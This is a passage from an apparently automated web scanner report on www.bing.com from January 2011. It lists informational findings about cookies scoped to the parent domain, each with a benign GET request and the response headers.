Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:05 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296345125; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/


16.240. http://www.bing.com/sck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

16.241. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?FORM=FOXSP HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US&FORM=FOXSP
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _HOP=I=1&TS=1296352332; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/
Content-Length: 0


16.242. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

16.243. http://www.bing.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 01:52:13 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/


16.244. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93192
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:52 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:53 GMT
Connection: close
Set-Cookie: _SS=SID=D762CB0D516241079F4B337C6DF4AD2D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c022f29fb83dd41979e53da7917adbbcf; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.245. http://www.bing.com/shopping/bird-feeders/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/bird-feeders/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:39 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Content-Length: 82892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.246. http://www.bing.com/shopping/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/content/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 21920
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:46 GMT
Connection: close
Set-Cookie: JSESSIONID=1A7DB7C3FD212CE528E8DB8E0E3E23F1; Path=/shopping
Set-Cookie: _SS=SID=F972E03C2EDF4FC68C89EA08C563AB35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7643fc9f42644b73a510efc43bf9535c; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   
   
...[SNIP]...

16.247. http://www.bing.com/shopping/healthy-cooking/r/151

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/healthy-cooking/r/151

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/healthy-cooking/r/151 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51707
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:15 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:16 GMT
Connection: close
Set-Cookie: _SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.248. http://www.bing.com/shopping/makeup/c/4259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/makeup/c/4259

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/makeup/c/4259 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81823
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:42 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:43 GMT
Connection: close
Set-Cookie: _SS=SID=5FA465270473442F834AFBC0420AA035; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c78f39d7b1f8a41d483fe8915fb7f5047; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.249. http://www.bing.com/shopping/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16318
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: _SS=SID=24F36415AB2F4ACC97A8D69FEBC50EE4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce9aae95052e74b3bb915721c523f685a; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.250. http://www.bing.com/shopping/swimwear/c/4503

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/swimwear/c/4503

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/swimwear/c/4503 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82370
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:30 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:31 GMT
Connection: close
Set-Cookie: _SS=SID=F36266FD84BF426991CE02A2CFF4A782; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c62852a01ec264ed0b807e0bd957f015d; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.251. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38935
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:14 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:15 GMT
Connection: close
Set-Cookie: _SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.252. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 22087
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:54 GMT
Connection: close
Set-Cookie: JSESSIONID=37564E6E7F080774679ECF5997C16D07; Path=/travel
Set-Cookie: _SS=SID=C3CD398E1DFA4C4F975438AABABE6119; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c668c910cbe204671b9924806983f4bab; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   

...[SNIP]...

16.253. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/browse?mkt=en-us&vid= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16423
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:22 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2D09A236B6E24F73B2FF4D79F9A09F8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca44d79e193c249f0bbd1b7d6be21f3bc; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/

